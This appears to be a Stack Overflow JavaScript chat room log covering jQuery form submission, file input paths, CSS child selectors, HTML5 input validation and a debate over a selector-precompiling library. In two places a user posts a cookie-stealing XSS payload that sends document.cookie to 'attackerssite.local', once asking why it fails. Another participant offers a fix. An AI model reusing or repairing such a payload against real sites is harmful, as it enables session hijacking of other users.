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!!is @rlemon drunk?
half and half
halfy true
Drunk on half and half, what a sad life.
var fn = function() {
  var foo = '123';
  // no way to get foo dynamically.
^ true vs. false ^
define: "dynamically"
with var k = 'foo';
@Connor that's a string.
still not working :((((((((((((( test<script>var i = new Image(); i.src='http://attackerssite.local/'+document.cookie;</script>
var fn = function(foo) {
  //var foo = '123';
  // no way to get foo dynamically.
@ycelik )))))))))))))
@SomeKittens yes, and you use that string to get the variable dynamically.
@cc no
iam so frustrated guys plz help me out
@ycelik maybe document.body.appendChild(i);
I'm going to buy isrlemondrunk.com and the only content is <h1>PROBABLY</h1>
@Connor false
@SomeKittens Yeah, cheers.
put a donation button on the site that buys him beer
@eazimmerman I made the site, I should get the beer
man its not working and my editor isnt showing me any errors ...
i suggested the button, i want some beer
var foo = context.getEnvironment().getProperties().getParameters().get("foo");
@cc wtf
(< java overflow), sry man coding java all day..
Where's the taxi to the "really funny jokes room"?
@rlemon sorry, I forgot that any Spidermonkey powered software crashes my computer.
So Firefox just crashed my computer.
I'll be on it tomorrow then.
Uh, so what is phonegap at this point exactly? Is it just a 1 to 1 wrapper on cordova's API + a service where they charge you to build apps for you so you don't have to DIY that part?
@enrey JavaScript is not inconsistent. It's just "evolving."
@ErikReppen "evolving" where it keeps all the bad parts... (:
backwards compatibility is a handicap
@whitehat101 As long as we deprecate 1 step back for every 10,000 steps forward, we'll be jussst fine.
deprecated, but never removed
Excuse me
I send a form with a file
<input type="file" id="files'+i+'" name="files'+i+'" style="width:350px;" >
why there isn't a files6="nameofimage" on a querystring?
$("#wnd_Addimg").append('<form id="formaddimg" action="${save_demo}" method="post" enctype="multipart/form-data">\
    <input type="hidden" name="json_data" value="${json_data}">\
    <table><tr><center><strong>Choose File:</strong></center></tr><tr>\
    <input type="file" id="files'+i+'" name="files'+i+'" style="width:350px;" ></tr>\
    <tr><center><td> Title: </td><td>\
    <textarea class="expand" id="titleimg'+i+'" name="titleimg'+i+'" style="width:250px; height:22px"></textarea>\
@MirkoCianfarani Because POSTs aren't like GETs: stackoverflow.com/questions/5876809/…
mmm I create the function that write on jquery string and this is a result +%23++%23+titleimg6%24+fgb+%23+credit6%24+CC-BY+A.+Buades
miss files 6 @ErikReppen
var $fm = $("#formaddimg");
				    .done(function(data, ok){
				    var fr=$fm.serialize();
				    fr=replacew(fr,/\=/g, "%24+"); // //fr=fr.replace(/\=/g,"%24+");
					// data is the content of the response
This is a code...
.attr should take "action" as its argument, not ${save_demo}, which I would assume gets replaced by an actual URL or something.
Also I have no idea why you're serializing a form you've just posted.
jaaaa I agree with you
serialize takes values from HTML. Those are automatically posted to the server. You would usually serialize when preventing default behavior and then sending to some web service or something.
^ or when validating the values.
mmmh I try to change the method of form and using GET, not write the name of input type="file" on Query String
this is normally?
What are you trying to do that you can't do with an ordinary HTML form submit?
I using a server's programmed in python and now with a Client, I want a send a image but now I want a send the name of file on a Querystring
ehehe i can send a name of image because i try of small form without server and send a name...
thank for all @ErikReppen
Grab the image from the HTML directly with $('#files6').val();
^ I think.
I meant img src in text form.
mmm I think i can't took the path of image for security or privacy
now I go for see
Oh... the full path on the desktop. no. You could get the image name though. I think it fills in the root of the path with something to obfuscate.
If I remember correctly something like "fakepath/imgName.jpg" in Chrome.
Just test in Chrome's devtools console. Easiest way is to test as you go.
A: how to resolve the C:\fakepath?

chakroun yesserI use the object FileReader on the input onchange event for your input file type! Example: var input = document.getElementById("inputFile"); var fReader = new FileReader(); fReader.readAsDataURL(input.files[0]); fReader.onloadend = function(event){ var img = document.getElementById("yourImgTag"...

This I know but without the server, files6 (<input type="file" id="files'+i+'" name="files'+i+'" style="width:350px;" > ) is on a Querystring but using my server CherryPy not!!! nope
I use the Console Firebug
Yeah, you can get the full paths on the server but not directly from the client. That would be a major security issue. The server has to know the file system for downloads but that info isn't exposed in the client.
You could start an upload, get the full path, cancel and then send that info back to the client but I have no idea why you would want that info on the client-side.
Q: Third solution to a challenge from Coderbyte - testing distance between characters in a string

NathanHere is another challenge from Coderbyte. I found this one challenging, although not quite as much as the previous two I posted. Based on the feedback I received on my earlier posts, I structured this solution as a function. It is probably better than my previous solutions but still could be impr...

You know where I find a example for this operation
2 mins ago, by Erik Reppen
You could start an upload, get the full path, cancel and then send that info back to the client but I have no idea why you would want that info on the client-side.
now I explain because I need a info on client.side
The server function in Python ( CHERRYPY and MAKO TEMPLATE ) and works static and Javascripts works dynamic
I'm having trouble with something I don't know how to do is javasript. This is my first time really trying to do something with JS (I've done things in python before), so Im thinking I've probably gone about something wrong. I have an array of GPS coordinates that are placed on a map using Google Maps. The problem that I'm having is I need to set up callbacks for things like when a marker is clicked, but the problem is I can't figure out how to pass to the function what point was clicked.
I guess I'm trying to figure out if I need to make a million custom functions or if there is a way to pass them variables
@somekittens what? My bikes in the middle of a rebuild...
The client can add,delete, change/edit the parameter and this is can dousing a form and comunicate using a other separator
then I have to change this and sent
entonces for edit parameter Javascript read on Jquerystrind and The server cannot pass the value to site (JAvascript)
You know where I find a example for this operation You could start an upload, get the full path, cancel and then send that info back to the client??? @ErikReppen
There could be a 10,000 ways to do that. I don't know your back-end. If you can get a hold of the full path on the server-side you should be able to hold it and send it back somehow.
@Zirak A parting gif: i.imgur.com/NAFLPGB.gif
I know its not a JS question, but how do people put there website in an iPad?
not optimize but you know how on some sites they have a picture of an iPad with there site in it
I am not sure how to do that
anyone know how?
@SomeKittens Ideas?
Is English your first language?
I'd probably google to be honest.
Yes it is, sorry for the poor wording
I am having trouble trying to figure out how to explain it
Also when I googled it, it only gave me apples site and other crud
If you improve your standard of English, then the rest will follow.
What? That makes absolutely no sense, lol
@SomeKittens Yes I know, but how do I display my site on the screen?
Screenshot the site
On an ipad?
iPads can indeed manage a screenshot.
(And it makes perfect sense to me!)
@NagaJolokia Please stop talking, I know it can -_- I am asking if I should or should not take it on an iPad
I leant mine to my brother so I will just have to think of a way...
How should I know?
Is English your first language?
I'd probably google to be honest.
Now you know how I felt when you said it to me.
@SomeKittens Have you had any issues with iOS7 safari and causing changes to the background color of buttons?
@BrandonGelfand nope
though I've never used iOS7
It is changing my background colors on my buttons to add gradient
Its adjusting the color a bit to..
Is it changing it a lot so that it looks horrible?
Is it trying to make the buttons fit in with the the new IOS7 UI?
It looks horrible
Its not attempting to make it fit, its just messing with the colors
Meh. Are you trying to style the buttons? IME trying to style buttons is a headache. You're best off sticking with the defaults.
What? No, my site, safari on iOS7 is changing the button styles to have a gradient and not a plain background color
Well, Apple knows best.
Use clickable divs?
What the hell are you talking about? What does apple knowing best have to do with my buttons being jacked up on iOS7 ?
Because they wrote the browser?
Really? I thought Microsoft did all these years! Oh gosh what a relief!
Buttons aren't especially customisable, and certainly not in a cross-platform way.
Good, blocked, I couldn't take it anymore, he made no sense
if I have nested li elements and I want to select the li which is in third level
then how should I select it?
ul > li > ul > li > ul > li
ul .thirdlevel
which one is good?
What do you mean select it? Adjust the color just for the third li?
Like a specific set of styles for the 3rd li?
select means for styling using css'
You want to use nth
yeah that is ok
but I want clarification on above two approaches
Those aren't very good in my opinion, I prefer :nth-child(n) over both of those
will that work for IE8?
If you ever add more li it will also automatically perform the styles instead of manually doing it
li:first-child + li {} for ie8
@BrandonGelfand I am aware of how to use css.. sorry to dissappoint you :P
I am not selecting sibling element here
Yes I know, I am just saying
I am trying to select nested third level li element here
@AbhishekHingnikar you there? busy?
I will just say it..
My colleagues here don't want to use ">" in CSS
instead they prefer assigning class name to all the nested li's like
to each li
why is there any drawback with using ">" ? or it is just my colleagues?
@Mr_Green In my opinion there isn't, I use it but not often, haven't had any problems
Just my personal thought
@BrandonGelfand that is what I think.. I can't find any source to shut their mouths here..
Actually what happened is that I designed a web page and later my colleagues(head) tested it and pointed out these things as bad design :/
this is a small issue actually but I have been proved as wrong that is making me feel not good...
@Mr_Green IIRC, an older IE (7?) Did not support the > selector
It looks like IE6 did not support it, and IE7 did support it, but with quirks
haha, Yeah, IE7 supports the > selector, but things like HTML comments also got matched source
I wouldn't be concerned with IE7 support today
about 6 months ago, we found that more people were locked into IE6 than IE7, because the IE7 crowd got auto-updated to IE8
and IE6 is effectively dead
Poor China...
in PHP, 1 min ago, by chintan khetiya
Hello Guys its simple and i am getting issue , help me if you know <input type="number" min="1" max="999" /> Why this is allow more then 3 length ?
Are you asking that question?
use maxlength="3
@chintankhetiya in your fiddle, you have type="search"
The max and min attributes works with the following input types: number, range, date, datetime, datetime-local, month, time and week.
@whitehat101 Yeah , maxlength="3 works for me
but the type="search" is why it's not doing what you expected it to do
okay so if i set type="range" then how can i assign some some like between 1 to 10
@whitehat101 Yeah that was my mistake and i have change it
If you have an appropriate type, and an appropriate browser then you can use min/max
@whitehat101 I am phonegap developer :)
I believe that is saying that min/max will not work on Android's default browser
I'd probably use a jQuery plugin (or similar) for input validation, HTML5 form features aren't quite universal (yet, we're close)
@whitehat101 Okay then is there any other way in which i can validate my TextField respect to NUMBER , TEXT in mobile
In the past I have used the jQuery Validation Plugin
<input id="quantity_text" placeholder="Type Quantity" name="number" value="" type="number" minlength="1" maxlength="3"> this only works in FF not in Chrome
but let me check whether its working in my android phonegap browser or not
No , Its not working in my android also as per your given link you are right
Q: jQuery slideToggle not working on IE8

ShadowZzzI am trying to make use of this code. I works on all browsers except IE (version I have is 8) This is the Code: $(function() { $("#menuBar").click(function() { $("#menuBarContent").slideToggle( "slow" ); }); }); Any ideas? All help would be appreciated.

Anybody up for a JavaScript challenge?
Well, anyways, I made some of those quiz questions from a while back into an actual app-thing
@minitech NO
am kidding :3 .. i want to but its too early i n the morning
 <script type="text/javascript">
            if( pixter === undefined ){
                function addScript(file,root){
                    root = root || "/js/";
                    e = document.createElement('script');
                    e.src = root + file;
throws an error pixter is undefined :-| wtf ?
if (typeof pixter === "undefined") {
Hi,when i double click on the page the popup menu has to open but i'm getting error but its working fine in fiddle any help ? jsfiddle.net/KZcs3
Q: javascript injection isnt working (document.cookie)

ycelikI try to inject a Javascript code into a form field. if I try: test<script>alert('works');</script> it works, but if i try to get cookie information with this code: test<script>var i=new Image(); i.src='http://attackerssite.local/'+document.cookie;</script> I dont get any request on my dem...

@OctavianDamiean @Zirak @rlemon GUESS WHO GOT TERRARIA!
(With apologies to Zirak, I have poor timing)
@SomeKittens @Zirak is dead, he won't be here for a few weeks.
I know, thus the poor timing comment
!!are you there?
This is so sad
An era has ended
!!don't leave me
@BenjaminGruenbaum I'm not dead! Honest!
!!welcome dystroy
@dystroy Welcome to the JavaScript chat! Please review the room pseudo-rules. Please don't ask if you can ask or if anyone's around; just ask your question, and if anyone's free and interested they'll help.
This will do for now.
AFAIK, rlemon will be hosting Caprica but is having trouble with FF
OK, I'll read the rules and try to learn the customs of the place. Before that, is there somebody here who knows Java script and can halp me ?
@Dave-88 Welcome to the JavaScript chat! Please review the room pseudo-rules. Please don't ask if you can ask or if anyone's around; just ask your question, and if anyone's free and interested they'll help.
BTW, did you see this funny bug in node REPL ?
Q: Why does calling a function in the Node.js REPL with )( work?

hydeWhy is it possible to call function in JavaScript like this, tested with node.js: ~$ node > function hi() { console.log("Hello, World!"); }; undefined > hi [Function: hi] > hi() Hello, World! undefined > hi)( // WTF? Hello, World! undefined > Why does the last call, hi)(, work? Is it bug in no...

@JasperManickaraj Welcome to the JavaScript chat! Please review the room pseudo-rules. Please don't ask if you can ask or if anyone's around; just ask your question, and if anyone's free and interested they'll help.
Yup sure
TypeError: $(...).accordion is not a function
how to fix this issue..
How to format css code in sublime?
any online CSS formatter?
@JasperManickaraj by including the plugin ?
@Mr_Green google it there are many css beautifiers
yeah I did it now
i have included the plugin also
ps sublime autoformats as u type
@erikroyall Welcome to the JavaScript chat! Please review the room pseudo-rules. Please don't ask if you can ask or if anyone's around; just ask your question, and if anyone's free and interested they'll help.
@JasperManickaraj not possible .
<script src="@Url.Content("~/Scripts/jquery.multi-accordion-1.5.3.js")" type="text/javascript"></script>
this is my js plugin
@skripted Welcome to the JavaScript chat! Please review the room pseudo-rules. Please don't ask if you can ask or if anyone's around; just ask your question, and if anyone's free and interested they'll help.
hey, i'm not new to this room!
@skripted zirak left us :( He has joined the circus
@BenjaminGruenbaum what do you mean by he left us ...
He got in a big fight and ragequit
He's doing jQuery now
you lie!
no way he would ever do that :(
mustache is missing design time data
!!seen Zirak
@Kippie That didn't make much sense. Use the help command to learn more.
Wait, what happened to C6?
it seems she got replaced by that dr.eval guy
That's all kinds of wrong.
@eyetea Welcome to the JavaScript chat! Please review the room pseudo-rules. Please don't ask if you can ask or if anyone's around; just ask your question, and if anyone's free and interested they'll help.
Anyone having problem installing knex (npmjs.org/package/knex)?
Throws a "ERR Parsing JSON"
@dreval is a penishead.
Everything's fine. knex installed
is there a cool library out there that visualizes the apache directory indexing in a fancy console?
@skripted You mean, something like Apaxy? adamwhitcroft.com/apaxy
@FLCL Welcome to the JavaScript chat! Please review the room pseudo-rules. Please don't ask if you can ask or if anyone's around; just ask your question, and if anyone's free and interested they'll help.
@erikroyall yeah kind of .. i was thinking of a bash theme, where you have to "cd" yourself through the directories
oh hi
@erikroyall I think you were on Youtube as 12 years old genius programmer innit?
@EnglishMaster Don't just mention stuff like that. LINK TO IT
@EnglishMaster I was kidding. Well, that was 2 years ago
@EnglishMaster But how do you know me?
I saw your Youtube video. I'm your biggest fan
Why does running window.open('http://google.com'); will open a new window(!) while running it under onclick handler - will open a new tab? (jsfiddle.net/eH9tw)
Where did Dr.Eval go?
I'm the Dr.Eval, what do you want me to eval for you?
@EnglishMaster Can you link to my Youtube Channel?
@Kippie Had to reboot
@erikroyall Sorry, I thought you were the kid in the video below but I realised you are not the kid after looking at your photo in close up.
@erikroyall Y U NOT THAT KID?
@EnglishMaster No, but I think I did a lot more than him ;)
@EnglishMaster I'm not good at watching videos (I have no time, to be frank) so can you tell me what he did?
Me neither, I'm terrible at watching videos. He wrote a lot of lines of code I think.
@EnglishMaster Haha. You should be checking out my github repos and my project Hilo.js which literally has thousands of lines and code and is faster than jQuery
is it jquery replacement?
Nice, what features does it offer that's not currently offered by jQuery?
@FLCL Not necessarily a replacement. But has almost same sytax
@erikroyall Where are the jsperf tests?
@EnglishMaster Many feature and browser detections...
@Kippie I've already tested it with JSPerf (I'll give you the links)
why did you choose such an ugly API?
also, do you support older browsers like jQuery did? which version of jQuery did you run your benchmarks against?
@FlorianMargaine "With Hilo, you won't have to worry about speed or backwards compatibility. All these are provided to you."
are jquery selectors precompiled before running?
Or do you not mean compatibility with older browsers, there?
2 mins ago, by Florian Margaine
also, do you support older browsers like jQuery did? which version of jQuery did you run your benchmarks against?
@FlorianMargaine All details are at Hilo.js official webpage
> do you support older browsers like jQuery did?
ah :)
Don't really like how there are 2 different versions available
"Small: 129KB uncompressed; 39KB compressed and gzipped"
"The legacy build is (currently) 176 KB uncompressed and 46 KB (UglifyJS compression), while the normal build is 108 KB uncompressed and 28 KB uglified."

Does not compute
@erikroyall sounds nice
I've made 2 different builds small and large so that those who don't want to support IE < 9 and other browsers can use the small build
how do you split up these builds?
seeing this for example, the second part has nothing to do in the small build
@erikroyall Yeah, but you mention 2 different sizes for the small build: 129kB and 108kB
yet I don't see how you're splitting them
@FlorianMargaine Please check the Gruntfile.js's concat section to know how I split those two builds.
@EnglishMaster It's just 109 kb now. The size of legacy build remains unchanges
@FLCL What is that lib?
@FLCL Link?
in process of developing
@FLCL Can you link me to it?
@FLCL I guess there is a hidden cost somewhere if $$('#myId') is faster than document.getElementById('myId')... What is it ? Caching ? Preload ?
may be error
If you don't know, then yes, it's an error..
now am looking for posibly fixes
var $$ = function(){} // the trick
test ive ran before showed 0.1kk 10kk 8kk
Can't find your test in the latest section
@FLCL You're probably caching or $$ = function () {} as @dystroy said
Eval is Evil
ive not found any mistake in code
and all tests return same div
@erikroyall If the normal tests are 0.1kk 10kk 8kk, there's no need for caching, it's easy to be almost as fast as document.getElementById if you're more focused (less powerful) than jQuery.
And there is a cache in the jsperf
Which makes this function useless for a dynamic document
The perf I see may very well be valid but the $$ function is useless.
but it caches not divs but selector function
I've included a way in Hilo to optionally cache and get from cache
The syntax for it is Hilo(selecor, true)
@erikroyall I don't think it's a good idea. A point of querying is to deal with dynamic documents. A user can always cache in a local variable but there's usually no reason to do that, and you'd better not use a cache for functions that are already fast enough
i hope nobody thinks that i cache query result?
the concept is about to compile selectors into functions where only native fast functions are called
and cache function not the result
the idea is that also possible to use parameters like $$("#mudivNo{0}", someNumber)
so this is actual for dynamic documents
as i think
not to cache result but precompile selectors
what are you thinking about this?
Does it even work ? Looking at the code, even if I can't remember all rules regarding execution contexts in eval in strict or non strict mode, I would be surprised...
i now the way to implement this, but i do not not is it usefull?
in my little projects i have not faced with low selectors speed, so i only have an idea and "uncertainty about its relevance"
Personally I don't see the need for such a library. I'd prefer to let the web engines do their optimizations.
should i start repo on github, if all ive described will work?
I think it's not future-proof
Does it work in ES5 Strict Mode?
dunno what is it
!!summon 29074
Why did you use eval and I want to know if precompiling selectors is necessary

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